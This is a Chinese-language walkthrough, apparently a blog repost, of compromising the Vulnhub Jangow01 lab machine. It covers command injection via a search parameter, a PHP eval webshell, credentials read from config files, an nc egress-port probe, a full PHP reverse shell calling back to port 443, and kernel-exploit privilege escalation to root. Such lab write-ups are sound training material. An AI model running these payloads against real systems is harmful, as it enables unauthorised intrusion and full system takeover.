0x01 信息收集
已知IP地址192.168.1.7,接下来就是扫描端口,哦不好意思,今天不用nmap,直接fscan走起
输入IP,一键双击
fscan64.exe -hf ip.txt -np -t 150
扫描得知开放了21FTP和80HTTP服务
直接浏览器访问HTTP服务
咦,目录遍历。访问site路径才是主页
0x02 web渗透
随便点点,点到右上角Buscar菜单栏的时候,显示空白,但是路径有点东西
http://192.168.1.7/site/busque.php?buscar=
猜测一下命令执行,输入id,直接显示,狂喜
随即ls查看一下目录,发现有个wordpress目录,看起来站点用是wordpress框架,进去看文件
发现有个config.php配置文件,随后用cat查看,但是显示是空的,直接查看源码,发现有数据库的账号密码等配置
http://192.168.1.7/site/busque.php?buscar=cat%20%20./wordpress/config.php
$servername = "localhost";$database = "desafio02";$username = "desafio02";$password = "abygurl69";
不过好像可能没什么用???之前扫描到的FTP服务用这个账号连接失败。
然后在home目录下拿到了user.txt
http://192.168.1.7/site/busque.php?buscar=cat%20%20/home/jangow01/user.txt
d41d8cd98f00b204e9800998ecf8427e唔,既然有命令执行的漏洞的话,是不是可以写一句话木马上去呢
<?php eval(@$_POST['anhunsec']); ?>http://192.168.1.7/site/busque.php?buscar=echo%20%27%3C?php%20eval(@$_POST[%27anhunsec%27]);%20?%3E%27%20%3Eshell.php
成功写上,测试蚁剑连接成功
在html目录下发现一个.backup的文件,打开是另一个数据库的账号密码
$servername = "localhost";$database = "jangow01";$username = "jangow01";$password = "abygurl69";
FTP用这个账号可以正常连接,哦,也许之前如果用ls -a的查看隐藏文件话,就可以找到这个账号直接连接FTP,那么也可以直接上传webshell或者后门了(好吧,刚试了好像FTP没权限上传?)
那还是用蚁剑去传一个反弹shell的PHP代码,不过很奇怪的是,试了很多种代码访问后反弹shell都没反应,而且也换了很多端口,就是没反弹。。
一筹莫展,是不是目标主机有端口的限制?所以我想到了防火墙,在linux系统中,防火墙有iptables和ufw两种防火墙,在蚁剑的终端看了一下,好像都没有权限
所以再想,目标主机编写sh脚本去使用nc探测全端口判断哪个端口可以出网,然后攻击机监听某个端口,看哪个端口成功监听(因为攻击机的NC其实不知道是要监听哪个端口,然后问了一下GPT,貌似不能同时监听全端口,网上找了一下答案,是要用iptables去把所有流量都转到指定一个端口监听)
sudo iptables -t nat -A PREROUTING -p tcp --dport 80:500 -j REDIRECT --to-port 4444编写sh脚本上传到目标主机在蚁剑终端窗口执行,并在攻击机上监听4444端口
for i in {400..450};dotimeout 1 nc -vz 192.168.1.8 $i && echo "$i open" >> 1.txt || echo "$i closed" >> 1.txt;done
运行结果如下:发现443端口是可以成功被监听的
攻击机返回结果,
那么就直接写入php反弹shell代码到443端口,然后nc监听443端口
// php-reverse-shell - A Reverse Shell implementation in PHP// Copyright (C) 2007 [email protected]set_time_limit (0);$VERSION = "1.0";$ip = '192.168.1.6'; // You have changed this$port = 443; // And this$chunk_size = 1400;$write_a = null;$error_a = null;$shell = 'uname -a; w; id; /bin/sh -i';$daemon = 0;$debug = 0;//// Daemonise ourself if possible to avoid zombies later//// pcntl_fork is hardly ever available, but will allow us to daemonise// our php process and avoid zombies. Worth a try...if (function_exists('pcntl_fork')) {// Fork and have the parent process exit$pid = pcntl_fork();if ($pid == -1) {printit("ERROR: Can't fork");exit(1);}if ($pid) {exit(0); // Parent exits}// Make the current process a session leader// Will only succeed if we forkedif (posix_setsid() == -1) {printit("Error: Can't setsid()");exit(1);}$daemon = 1;} else {printit("WARNING: Failed to daemonise. This is quite common and not fatal.");}// Change to a safe directorychdir("/");// Remove any umask we inheritedumask(0);//// Do the reverse shell...//// Open reverse connection$sock = fsockopen($ip, $port, $errno, $errstr, 30);if (!$sock) {printit("$errstr ($errno)");exit(1);}// Spawn shell process$descriptorspec = array(0 => array("pipe", "r"), // stdin is a pipe that the child will read from1 => array("pipe", "w"), // stdout is a pipe that the child will write to2 => array("pipe", "w") // stderr is a pipe that the child will write to);$process = proc_open($shell, $descriptorspec, $pipes);if (!is_resource($process)) {printit("ERROR: Can't spawn shell");exit(1);}// Set everything to non-blocking// Reason: Occsionally reads will block, even though stream_select tells us they won'tstream_set_blocking($pipes[0], 0);stream_set_blocking($pipes[1], 0);stream_set_blocking($pipes[2], 0);stream_set_blocking($sock, 0);printit("Successfully opened reverse shell to $ip:$port");while (1) {// Check for end of TCP connectionif (feof($sock)) {printit("ERROR: Shell connection terminated");break;}// Check for end of STDOUTif (feof($pipes[1])) {printit("ERROR: Shell process terminated");break;}// Wait until a command is end down $sock, or some// command output is available on STDOUT or STDERR$read_a = array($sock, $pipes[1], $pipes[2]);$num_changed_sockets = stream_select($read_a, $write_a, $error_a, null);// If we can read from the TCP socket, send// data to process's STDINif (in_array($sock, $read_a)) {if ($debug) printit("SOCK READ");$input = fread($sock, $chunk_size);if ($debug) printit("SOCK: $input");fwrite($pipes[0], $input);}// If we can read from the process's STDOUT// send data down tcp connectionif (in_array($pipes[1], $read_a)) {if ($debug) printit("STDOUT READ");$input = fread($pipes[1], $chunk_size);if ($debug) printit("STDOUT: $input");fwrite($sock, $input);}// If we can read from the process's STDERR// send data down tcp connectionif (in_array($pipes[2], $read_a)) {if ($debug) printit("STDERR READ");$input = fread($pipes[2], $chunk_size);if ($debug) printit("STDERR: $input");fwrite($sock, $input);}}fclose($sock);fclose($pipes[0]);fclose($pipes[1]);fclose($pipes[2]);proc_close($process);// Like print, but does nothing if we've daemonised ourself// (I can't figure out how to redirect STDOUT like a proper daemon)function printit ($string) {if (!$daemon) {print "$string";}}
反弹shell后使用python3升级为常规的shell
python3 -c 'import pty;pty.spawn("/bin/bash")'
0x03 root提权
然后可知他的内核是4.4.0-31查找合适的提权脚本
searchsploit ubuntu 4.4.0-31linux/local/45010.c
然后复制到根目录
searchsploit -m linux/local/45010.c然后上传到目标主机使用gcc进行编译,编译后执行,获得root权限
gcc 45010.c -o exp
在root目录下,拿到root的flag
da39a3ee5e6b4b0d3255bfef95601890afd80709
0x04 总结
其实这个靶场不难,只不过有个地方卡壳了,就是没想到靶机会限制端口出网,导致一些端口不能正常反弹shell,在网上才找到解决方案,也是新学到了一个思路:目标主机使用nc探测出网情况(GPT写的脚本不太行,还是大佬写的好),并且在攻击机上使用iptables把所有端口传入的流量指定在一个端口上进行监听,那么在目标主机上就知道哪个端口能够被攻击机监听。
原文始发于微信公众号(暗魂攻防实验室):【渗透测试】Vulnhub靶场之Jangow01
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论